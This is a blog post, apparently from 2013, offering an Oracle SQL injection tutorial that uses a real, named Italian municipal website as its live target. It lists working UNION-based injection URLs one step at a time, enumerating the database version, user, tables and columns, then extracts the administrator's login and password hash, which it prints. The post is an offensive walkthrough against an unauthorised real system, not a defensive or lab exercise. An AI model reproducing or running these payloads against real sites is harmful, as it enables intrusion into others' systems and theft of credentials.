Monday 2 December 2013
» »Unlabelled » Oracle SQL injection tutorial

on
No Comment
Hello guys this is a tutorial about Oracle based SQL injection .
Here is the site to learn with

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 

Let's try order by 

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 order by 1 

look under the picture shit stays like this
Sei in : Home -> Citta' -> Congressi

At order by 7 boom changes

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122%20order%20by%207 
Sei in : Home -> Citta' ->
Then no. of columns=6

Time to use union select 

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,null,null,null,null,null 

LOLS...Vulnerable column isn't shown..
Let's try all columns

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select banner,null,null,null,null,null from v$version 

nothing shown wrong column

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,banner,null,null,null,null from v$version 

word congress shown again..This is the right column
change id_categoria to null

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null%20union%20select%20null,banner,null,null,null,null%20from% ​20v$version 

version: CORE 9.2.0.6.0 Production


CURRENT USER

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,user,NULL,NULL,NULL,NULL from dual--
output=WWWTARANTO

CURRENT DATABASE


Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,SYS.DATABASE_NAME,NULL,NULL,NULL,NULL from DUAL--

output=CSTTA

another methods :
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,global_name,NULL,NULL,NULL,NULL from global_name-- -



time to get tables
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null union select null,table_name,null,null,null,null from (select ROWNUM r,table_name from all_tables order by table_name) where r=130
This will get table number 130...Change r to get table number

time to get this table's columns

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null%20union%20select%20null,column_name,null,null,null,null%20 ​ from%20%28select%20ROWNUM%20r,column_name%20from%20all_tab_columns%20where%20tab ​le_name=%27RESULT$%27%29%20where%20r=3 

change with r here too

Retrieving user created tables and columns from user_tab_columns. concat() works but takes only 2 parameters.


Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS--

54425F414C424F3A444154415F45534543555A494F4E45
convert this hex value to string.
TB_ALBO:DATA_ESECUZIONE

To find the next column of table TB_ALBO

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where column_name> CHR(68) || CHR(65) || CHR(84) || CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) || CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--

Code:
CHR(68) || CHR(65) || CHR(84) || CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) || CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69) = DATA_ESECUZIONE

54425F414C424F3A444154415F505542424C4943415A494F4E45
TB_ALBO:DATA_PUBBLICAZIONE

using > all columns can be retrieved. If any error is generated or query jumps to some other table, then move on to the next table.

MOVING TO NEXT TABLE

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) || CHR(65) || CHR(76) || CHR(66) || CHR(79)--

54425F414C424F5F444F43554D454E544F3A4445534352495A494F4E45
TB_ALBO_DOCUMENTO:DESCRIZIONE

MOVING TO NEXT COLUMN OF TABLE TB_ALBO_DOCUMENTO

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) || CHR(65) || CHR(76) || CHR(66) || CHR(79) and column_name> CHR(68) || CHR(69) || CHR(83) || CHR(67) || CHR(82) || CHR(73) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--

54425F414C424F5F444F43554D454E544F3A4944
TB_ALBO_DOCUMENTO:ID

EXTRACTING DATA

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(LOGIN||chr(58)||PASSWORD),NULL,NULL,NULL,NULL from TB_UTENTE--

61646D696E6973747261746F723A3966323165646463363865663338373837666235656639313939​316265613264

administrator:9f21eddc68ef38787fb5ef91991bea2d
Posted by at 09:47
Share:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)